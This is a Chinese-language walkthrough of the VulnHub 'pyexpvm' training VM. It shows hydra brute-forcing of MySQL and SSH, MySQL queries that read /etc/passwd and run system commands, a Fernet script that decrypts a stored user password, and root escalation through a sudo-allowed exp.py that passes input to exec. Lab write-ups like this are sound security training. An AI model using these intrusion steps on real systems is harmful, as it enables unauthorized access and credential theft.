pyexpvm靶场实战详解
靶机:https://download.vulnhub.com/pyexp/pyexpvm.zip
难度:中
目标:取得root权限+2Flag 网络配置:这里简单介绍下我的网络配置,靶机和Kali都用的VMware,然后使用nat连接,开启了dhcp。
虚拟网络编辑器:
Kali:
首先使用下面这条命令发现靶机的ip地址为192.168.26.130。
arp-scan -l
然后开始使用nmap进行端口和服务的发现。
nmap -p- -sC -sV 192.168.26.130
经过对开放端口和服务的扫描,发现1337开放了ssh服务 ,3306开放了mysql服务。我首先通过searchsploit 搜索这两个服务对应版本的漏洞并且进行了尝试后均失败。
那么现在只能开始暴力破解了,开两个窗口一个爆破ssh,另一个爆破mysql。
hydra -l root -P rockyou.txt mysql://192.168.26.130
hydra -l root -P rockyou.txt ssh://192.168.26.130
如上图所示,经过hydra的爆破,成功获取到了mysql的账号和密码。这里顺便提一下,ssh爆破失败了。
接着尝试使用得到的mysql账号和密码进行登录
mysql -u root -h 192.168.26.130 -p
select do_system('id'); #尝试使用该语句直接执行系统命令
select load_file('/etc/passwd'); #尝试使用语句读取文件
发现可以执行该语句,并且成功读取到了该文件的内容,在这个文件中发现了lucy这个用户。
然后我在data数据库的fernet表中发现了如下图所示的两个字段,一个是凭据的意思,一个是密钥的意思,一看对应的值就是经过某种加密过后的密文,而key可能就是加解密的密钥。
cred:gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys=
keyy:
UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=
限于我对密码学了解甚少,所以我直接开始百度,还真给我搜到了。
通过上面这张图,我们可以知道这个fernet算法用的是python中的cryptography库,所以我选择直接去读这个库的手册。
https://cryptography.io/en/latest/
通过阅读这个库的手册我大概知道了加密和解密的这么一个过程。然后直接写解密脚本。
from cryptography.fernet import Fernet
key = b'UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0='
f = Fernet(key)
token = b'gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys='
f.decrypt(token)
解密过程如下图所示:
b'lucy:wJ9`"Lemdv9[FEw-'
想起来之前发现的lucy账号,我们感觉这就是lucy的账号和密码。
账号:lucy
密码:wJ9`"Lemdv9[FEw-
尝试进行ssh登录。
ssh [email protected] -p 1337
登录成功后在当前目录下读取到了第一个flag。
然后通过sudo -l命令发现,可以以root用户的身份无密码执行exp.py这个文件,并且执行这个文件时,用户的输入会交给exec函数去执行。到这里我们的提权思路就有了,直接拿出我们常用的提权代码。
import pty;pty.spawn("/bin/bash")
通过上图可以看到成功实现了提权,然后我在root目录下发现了第二个flag。
你说没有Web服务就无法渗透了?不可否认,渗透测试最常面对的服务类型是Web,但如果将渗透与WEB渗透画上等号,认知就太过片面了。今天这台靶机就完全没有WEB服务,我们从爆破密码和搜寻已知漏洞的角度入手,通过暴力破解获取到了mysql数据库的账号密码,尝试读取了系统机密文件,甚至直接执行操作系统命令(失败了)。接着编写了针对fernet模块加密算法的解密脚本,对我们原本并不熟悉的加密算法进行了解密,取得了lucy的身份认证信息,从而突破了边界。提权阶段通过阅读了exp.py脚本的代码,并以此注入了一些简单的提权代码,结合系统权限配置漏洞,最终取得了Root权限。这是一台非常具有特色的靶机,感兴趣的师傅也可以下载到本地来玩一玩。